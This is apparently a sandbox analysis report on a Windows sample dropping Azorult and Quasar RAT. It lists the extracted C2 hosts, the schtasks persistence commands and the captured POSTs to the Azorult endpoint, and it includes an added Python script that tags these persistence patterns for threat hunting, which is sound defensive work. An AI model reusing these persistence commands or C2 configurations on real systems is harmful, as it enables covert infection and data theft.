Analysis

  • max time kernel
    5s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    01/12/2024, 12:46 UTC

General

  • Target

    HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe

  • Size

    2.0MB

  • MD5

    71254d11715816c90a2e6f5b3cd3b020

  • SHA1

    e97d074667058c075210de8cc5e8cec0277f30dc

  • SHA256

    aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35

  • SHA512

    91a9f217b39050b690ca8b299b042348b2327f93f0d03c310ed4b79df3eb3747806dfd8401a16c42bb75490e04cef508474e04509e72c6b3d3b6c6e9ad815ece

  • SSDEEP

    24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKYf:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9YB

Malware Config

Extracted

Family

azorult

C2

http://0x21.in:8000/_az/

Extracted

Family

quasar

Version

1.3.0.0

Botnet

EbayProfiles

C2

5.8.88.191:443

sockartek.icu:443

Mutex

QSR_MUTEX_0kBRNrRz5TDLEQouI0

Attributes
  • encryption_key

    MWhG6wsClMX8aJM2CVXT

  • install_name

    winsock.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    win defender run

  • subdirectory

    SubDir

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Azorult family
  • Quasar RAT 3 IoCs

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe
    "C:\Users\Admin\AppData\Local\Temp\HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe"
    • Quasar RAT
    • Checks computer location settings
    • Enumerates connected drives
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1648
      • C:\Users\Admin\AppData\Local\Temp\vnc.exe
        "C:\Users\Admin\AppData\Local\Temp\vnc.exe"
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2872
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k
            PID:960
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2872 -s 556
            • Program crash
            PID:3884
      • C:\Users\Admin\AppData\Local\Temp\windef.exe
        "C:\Users\Admin\AppData\Local\Temp\windef.exe"
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2180
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\windef.exe" /rl HIGHEST /f
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:4420
          • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
            "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3948
              • C:\Windows\SysWOW64\schtasks.exe
                "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:5076
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pMXiLzecL3Ep.bat" "
                PID:4404
                  • C:\Windows\SysWOW64\chcp.com
                    chcp 65001
                    PID:5092
                  • C:\Windows\SysWOW64\PING.EXE
                    ping -n 10 localhost
                    • System Network Configuration Discovery: Internet Connection Discovery
                    • Runs ping.exe
                    PID:800
                  • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
                    "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
                    PID:4792
                      • C:\Windows\SysWOW64\schtasks.exe
                        "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f
                        • Scheduled Task/Job: Scheduled Task
                        PID:1640
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WcRtpUTMoxCx.bat" "
                        PID:3504
                          • C:\Windows\SysWOW64\chcp.com
                            chcp 65001
                            PID:4560
                          • C:\Windows\SysWOW64\PING.EXE
                            ping -n 10 localhost
                            • System Network Configuration Discovery: Internet Connection Discovery
                            • Runs ping.exe
                            PID:1968
                          • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
                            "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
                            PID:2892
                              • C:\Windows\SysWOW64\schtasks.exe
                                "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f
                                • Scheduled Task/Job: Scheduled Task
                                PID:372
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 4792 -s 2252
                        • Program crash
                        PID:3088
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 2260
                • Program crash
                PID:3788
      • C:\Users\Admin\AppData\Local\Temp\HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe
        "C:\Users\Admin\AppData\Local\Temp\HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe"
        • System Location Discovery: System Language Discovery
        PID:1476
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:1256
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2872 -ip 2872
    PID:2596
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3948 -ip 3948
    PID:4548
  • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
    C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
    PID:4988
      • C:\Users\Admin\AppData\Local\Temp\vnc.exe
        "C:\Users\Admin\AppData\Local\Temp\vnc.exe"
        PID:4512
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k
            PID:2448
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 532
            • Program crash
            PID:992
      • C:\Users\Admin\AppData\Local\Temp\windef.exe
        "C:\Users\Admin\AppData\Local\Temp\windef.exe"
        PID:4580
      • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
        "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe"
        PID:1612
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F
        • Scheduled Task/Job: Scheduled Task
        PID:1224
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4512 -ip 4512
    PID:1288
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4792 -ip 4792
    PID:2204
  • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
    "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
    PID:1492
  • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
    "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
    PID:4644
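The process tree above contains two persistence chains: the Quasar "win defender run" logon task (first pointing at the dropped windef.exe, then at the %APPDATA%\SubDir\winsock.exe install path), relaunched through a .bat that uses "ping -n 10 localhost" as a delay, and a separate RtkAudioService64 task that fires every minute and runs C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe. The script below is an added worked example, not part of the tria.ge report and not Quasar's or Azorult's code: it parses the schtasks command lines transcribed from the tree, checks them against the extracted Quasar config, and tags the shapes a hunter would look for in process-creation telemetry (Sysmon Event ID 1 / Security 4688). The tag names and the "user-writable path" heuristic are this example's own.

```python
"""Added example: does the persistence seen in the process tree match the
extracted Quasar config? Not from the tria.ge report or from Quasar itself."""
import ntpath
import re

# Values copied from the report's "Malware Config" section.
QUASAR_CONFIG = {
    "install_name": "winsock.exe",
    "subdirectory": "SubDir",
    "startup_key": "win defender run",
}

# Command lines transcribed from the "Processes" section (constructed sample input;
# in practice feed Sysmon Event ID 1 / Security 4688 CommandLine fields).
COMMAND_LINES = [
    r'"schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\windef.exe" /rl HIGHEST /f',
    r'"schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f',
    r'"C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F',
    r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pMXiLzecL3Ep.bat" "',
    r'ping -n 10 localhost',
    r'C:\Windows\system32\svchost.exe -k',
]

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')
# "ping -n N localhost" is the classic batch-file sleep between delete/relaunch steps.
_PING_SLEEP = re.compile(r'^ping(\.exe)?\s+-n\s+\d+\s+(localhost|127\.0\.0\.1)\b', re.I)


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted arguments intact."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]


def parse_schtasks(cmdline):
    """Return schtasks switches as {switch: value-or-True}, or None if this is not schtasks."""
    tokens = tokenize(cmdline)
    if not tokens or ntpath.basename(tokens[0]).lower() not in ("schtasks", "schtasks.exe"):
        return None
    opts, i = {}, 1
    while i < len(tokens):
        if tokens[i].startswith("/"):
            has_value = i + 1 < len(tokens) and not tokens[i + 1].startswith("/")
            opts[tokens[i][1:].lower()] = tokens[i + 1] if has_value else True
            i += 2 if has_value else 1
        else:
            i += 1
    return opts


def assess_task(opts, config):
    """Tag one parsed 'schtasks /create'. Tag names and thresholds are this example's own."""
    target = opts.get("tr") if isinstance(opts.get("tr"), str) else ""
    sched = str(opts.get("sc", "")).lower()
    tags = []
    if target.lower().startswith("c:\\users\\"):
        tags.append("user_path_target")            # task runs a binary from a user-writable path
    if sched == "onlogon" and str(opts.get("rl", "")).lower() == "highest":
        tags.append("onlogon_highest")             # Quasar's default persistence shape
    if sched == "minute" and opts.get("mo") == "1":
        tags.append("every_minute")                # relaunch loop, not normal software behaviour
    if opts.get("tn") == config["startup_key"]:
        tags.append("task_name_matches_config")
    if (ntpath.basename(target).lower() == config["install_name"].lower()
            and ntpath.basename(ntpath.dirname(target)).lower() == config["subdirectory"].lower()):
        tags.append("install_path_matches_config")  # <subdirectory>\<install_name> under the profile
    return tags


def analyse(cmdlines, config=QUASAR_CONFIG):
    """Map index -> tags for every command line worth a second look."""
    findings = {}
    for idx, cmdline in enumerate(cmdlines):
        opts = parse_schtasks(cmdline)
        if opts is not None and "create" in opts:
            tags = assess_task(opts, config)
        else:
            tags = ["ping_sleep"] if _PING_SLEEP.match(cmdline.strip()) else []
        if tags:
            findings[idx] = tags
    return findings


if __name__ == "__main__":
    for idx, tags in analyse(COMMAND_LINES).items():
        print(f"[{idx}] {', '.join(tags)}\n      {COMMAND_LINES[idx]}")
```

Run as-is, both "win defender run" tasks come out Quasar-shaped (ONLOGON, /rl HIGHEST, target under the user profile) and the second also matches the config's SubDir\winsock.exe install path; the RtkAudioService64 task is tagged only for its every-minute schedule and user-path target, because neither extracted config describes it, so it warrants its own look. Note that /rl HIGHEST asks for the highest privilege level available to the creating account; the task still runs as that user.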

                                      Network

                                      • flag-us
                                        DNS
                                        8.8.8.8.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        8.8.8.8.in-addr.arpa
                                        IN PTR
                                        Response
                                        8.8.8.8.in-addr.arpa
                                        IN PTR
                                        dnsgoogle
                                      • flag-us
                                        DNS
                                        0x21.in
                                        HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        0x21.in
                                        IN A
                                        Response
                                        0x21.in
                                        IN A
                                        44.221.84.105
                                      • flag-us
                                        DNS
                                        228.249.119.40.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        228.249.119.40.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        172.214.232.199.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        172.214.232.199.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        POST
                                        http://0x21.in:8000/_az/
                                        HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe
                                        Remote address:
                                        44.221.84.105:8000
                                        Request
                                        POST /_az/ HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                        Host: 0x21.in:8000
                                        Content-Length: 99
                                        Cache-Control: no-cache
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Sun, 01 Dec 2024 12:46:17 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                        Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                        Set-Cookie: btst=31a4c7d7172daf7a43696dc5e7023b19|181.215.176.83|1733057177|1733057177|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                        Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                      • flag-us
                                        DNS
                                        0x21.in
                                        HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        0x21.in
                                        IN A
                                        Response
                                        0x21.in
                                        IN A
                                        44.221.84.105
                                      • flag-us
                                        POST
                                        http://0x21.in/_az/
                                        HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe
                                        Remote address:
                                        44.221.84.105:8000
                                        Request
                                        POST /_az/ HTTP/1.0
                                        Host: 0x21.in
                                        Connection: close
                                        User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                        Content-Length: 99
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Sun, 01 Dec 2024 12:46:17 GMT
                                        Content-Type: text/html
                                        Connection: close
                                        Set-Cookie: btst=b28a42f3ef59c74522961a2a1099d04c|181.215.176.83|1733057177|1733057177|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                        Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                      • flag-us
                                        DNS
                                        105.84.221.44.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        105.84.221.44.in-addr.arpa
                                        IN PTR
                                        Response
                                        105.84.221.44.in-addr.arpa
                                        IN PTR
                                        ec2-44-221-84-105 compute-1 amazonawscom
                                      • flag-us
                                        DNS
                                        ip-api.com
                                        winsock.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        ip-api.com
                                        IN A
                                        Response
                                        ip-api.com
                                        IN A
                                        208.95.112.1
                                      • flag-us
                                        GET
                                        http://ip-api.com/json/
                                        windef.exe
                                        Remote address:
                                        208.95.112.1:80
                                        Request
                                        GET /json/ HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                        Host: ip-api.com
                                        Connection: Keep-Alive
                                        Response
                                        HTTP/1.1 200 OK
                                        Date: Sun, 01 Dec 2024 12:46:18 GMT
                                        Content-Type: application/json; charset=utf-8
                                        Content-Length: 291
                                        Access-Control-Allow-Origin: *
                                        X-Ttl: 57
                                        X-Rl: 43
                                      • flag-us
                                        DNS
                                        1.112.95.208.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        1.112.95.208.in-addr.arpa
                                        IN PTR
                                        Response
                                        1.112.95.208.in-addr.arpa
                                        IN PTR
                                        ip-apicom
                                      • flag-us
                                        GET
                                        http://ip-api.com/json/
                                        winsock.exe
                                        Remote address:
                                        208.95.112.1:80
                                        Request
                                        GET /json/ HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                        Host: ip-api.com
                                        Connection: Keep-Alive
                                        Response
                                        HTTP/1.1 200 OK
                                        Date: Sun, 01 Dec 2024 12:46:19 GMT
                                        Content-Type: application/json; charset=utf-8
                                        Content-Length: 291
                                        Access-Control-Allow-Origin: *
                                        X-Ttl: 33
                                        X-Rl: 42
                                      • flag-us
                                        DNS
                                        71.159.190.20.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        71.159.190.20.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        95.221.229.192.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        95.221.229.192.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        58.55.71.13.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        58.55.71.13.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        sockartek.icu
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        sockartek.icu
                                        IN A
                                        Response
                                      • flag-us
                                        DNS
                                        50.23.12.20.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        50.23.12.20.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        171.39.242.20.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        171.39.242.20.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        92.12.20.2.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        92.12.20.2.in-addr.arpa
                                        IN PTR
                                        Response
                                        92.12.20.2.in-addr.arpa
                                        IN PTR
                                        a2-20-12-92deploystaticakamaitechnologiescom
                                      • flag-us
                                        DNS
                                        ip-api.com
                                        winsock.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        ip-api.com
                                        IN A
                                        Response
                                        ip-api.com
                                        IN A
                                        208.95.112.1
                                      • flag-us
                                        GET
                                        http://ip-api.com/json/
                                        Remote address:
                                        208.95.112.1:80
                                        Request
                                        GET /json/ HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                        Host: ip-api.com
                                        Connection: Keep-Alive
                                        Response
                                        HTTP/1.1 200 OK
                                        Date: Sun, 01 Dec 2024 12:46:55 GMT
                                        Content-Type: application/json; charset=utf-8
                                        Content-Length: 291
                                        Access-Control-Allow-Origin: *
                                        X-Ttl: 60
                                        X-Rl: 44
                                      • flag-us
                                        POST
                                        http://0x21.in:8000/_az/
                                        Remote address:
                                        44.221.84.105:8000
                                        Request
                                        POST /_az/ HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                        Host: 0x21.in:8000
                                        Content-Length: 99
                                        Cache-Control: no-cache
                                        Cookie: snkz=181.215.176.83; btst=31a4c7d7172daf7a43696dc5e7023b19|181.215.176.83|1733057177|1733057177|0|1|0
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Sun, 01 Dec 2024 12:47:04 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                        Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                        Set-Cookie: btst=31a4c7d7172daf7a43696dc5e7023b19|181.215.176.83|1733057224|1733057177|23|2|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                      • POST http://0x21.in/_az/
                                        Remote address: 44.221.84.105:8000
                                        Request
                                          POST /_az/ HTTP/1.0
                                          Host: 0x21.in
                                          Connection: close
                                          User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                          Content-Length: 99
                                        Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 01 Dec 2024 12:47:05 GMT
                                          Content-Type: text/html
                                          Connection: close
                                          Set-Cookie: btst=8cde7ae99fd58253bf996f5b371f7869|181.215.176.83|1733057225|1733057225|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                          Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                      • DNS 83.210.23.2.in-addr.arpa
                                        Remote address: 8.8.8.8:53
                                        Request
                                          83.210.23.2.in-addr.arpa IN PTR
                                        Response
                                          83.210.23.2.in-addr.arpa IN PTR a2-23-210-83.deploy.static.akamaitechnologies.com
                                      • DNS sockartek.icu
                                        Remote address: 8.8.8.8:53
                                        Request
                                          sockartek.icu IN A
                                        Response
                                      • GET http://ip-api.com/json/
                                        Remote address: 208.95.112.1:80
                                        Request
                                          GET /json/ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                          Host: ip-api.com
                                          Connection: Keep-Alive
                                        Response
                                          HTTP/1.1 200 OK
                                          Date: Sun, 01 Dec 2024 12:47:31 GMT
                                          Content-Type: application/json; charset=utf-8
                                          Content-Length: 291
                                          Access-Control-Allow-Origin: *
                                          X-Ttl: 60
                                          X-Rl: 44
                                      • DNS sockartek.icu
                                        Remote address: 8.8.8.8:53
                                        Request
                                          sockartek.icu IN A
                                        Response
                                      • 44.221.84.105:8000 | http://0x21.in:8000/_az/ | http | HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe | 528 B | 870 B | 6 | 5
                                        HTTP Request: POST http://0x21.in:8000/_az/
                                        HTTP Response: 200
                                      • 44.221.84.105:8000 | http://0x21.in/_az/ | http | HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe | 471 B | 590 B | 5 | 5
                                        HTTP Request: POST http://0x21.in/_az/
                                        HTTP Response: 200
                                      • 208.95.112.1:80 | http://ip-api.com/json/ | http | windef.exe | 374 B | 560 B | 5 | 2
                                        HTTP Request: GET http://ip-api.com/json/
                                        HTTP Response: 200
                                      • 208.95.112.1:80 | http://ip-api.com/json/ | http | winsock.exe | 374 B | 560 B | 5 | 2
                                        HTTP Request: GET http://ip-api.com/json/
                                        HTTP Response: 200
                                      • 5.8.88.191:443 | winsock.exe | 260 B | 5
                                      • 208.95.112.1:80 | http://ip-api.com/json/ | http | 374 B | 560 B | 5 | 2
                                        HTTP Request: GET http://ip-api.com/json/
                                        HTTP Response: 200
                                      • 5.8.88.191:443 | 260 B | 5
                                      • 44.221.84.105:8000 | http://0x21.in:8000/_az/ | http | 639 B | 791 B | 6 | 5
                                        HTTP Request: POST http://0x21.in:8000/_az/
                                        HTTP Response: 200
                                      • 44.221.84.105:8000 | http://0x21.in/_az/ | http | 471 B | 590 B | 5 | 5
                                        HTTP Request: POST http://0x21.in/_az/
                                        HTTP Response: 200
                                      • 208.95.112.1:80 | http://ip-api.com/json/ | http | 374 B | 560 B | 5 | 2
                                        HTTP Request: GET http://ip-api.com/json/
                                        HTTP Response: 200
                                      • 5.8.88.191:443 | 260 B | 5
                                      • 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | dns | 66 B | 90 B | 1 | 1
                                        DNS Request: 8.8.8.8.in-addr.arpa
                                      • 8.8.8.8:53 | 0x21.in | dns | HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe | 53 B | 69 B | 1 | 1
                                        DNS Request: 0x21.in
                                        DNS Response: 44.221.84.105
                                      • 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | dns | 73 B | 159 B | 1 | 1
                                        DNS Request: 228.249.119.40.in-addr.arpa
                                      • 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | dns | 74 B | 128 B | 1 | 1
                                        DNS Request: 172.214.232.199.in-addr.arpa
                                      • 8.8.8.8:53 | 0x21.in | dns | HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe | 53 B | 69 B | 1 | 1
                                        DNS Request: 0x21.in
                                        DNS Response: 44.221.84.105
                                      • 8.8.8.8:53 | 105.84.221.44.in-addr.arpa | dns | 72 B | 127 B | 1 | 1
                                        DNS Request: 105.84.221.44.in-addr.arpa
                                      • 8.8.8.8:53 | ip-api.com | dns | winsock.exe | 56 B | 72 B | 1 | 1
                                        DNS Request: ip-api.com
                                        DNS Response: 208.95.112.1
                                      • 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | dns | 71 B | 95 B | 1 | 1
                                        DNS Request: 1.112.95.208.in-addr.arpa
                                      • 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | dns | 72 B | 158 B | 1 | 1
                                        DNS Request: 71.159.190.20.in-addr.arpa
                                      • 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | dns | 73 B | 144 B | 1 | 1
                                        DNS Request: 95.221.229.192.in-addr.arpa
                                      • 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | dns | 70 B | 144 B | 1 | 1
                                        DNS Request: 58.55.71.13.in-addr.arpa
                                      • 8.8.8.8:53 | sockartek.icu | dns | 59 B | 124 B | 1 | 1
                                        DNS Request: sockartek.icu
                                      • 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | dns | 70 B | 156 B | 1 | 1
                                        DNS Request: 50.23.12.20.in-addr.arpa
                                      • 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | dns | 72 B | 158 B | 1 | 1
                                        DNS Request: 171.39.242.20.in-addr.arpa
                                      • 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | dns | 69 B | 131 B | 1 | 1
                                        DNS Request: 92.12.20.2.in-addr.arpa
                                      • 8.8.8.8:53 | ip-api.com | dns | winsock.exe | 56 B | 72 B | 1 | 1
                                        DNS Request: ip-api.com
                                        DNS Response: 208.95.112.1
                                      • 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | dns | 70 B | 133 B | 1 | 1
                                        DNS Request: 83.210.23.2.in-addr.arpa
                                      • 8.8.8.8:53 | sockartek.icu | dns | 59 B | 124 B | 1 | 1
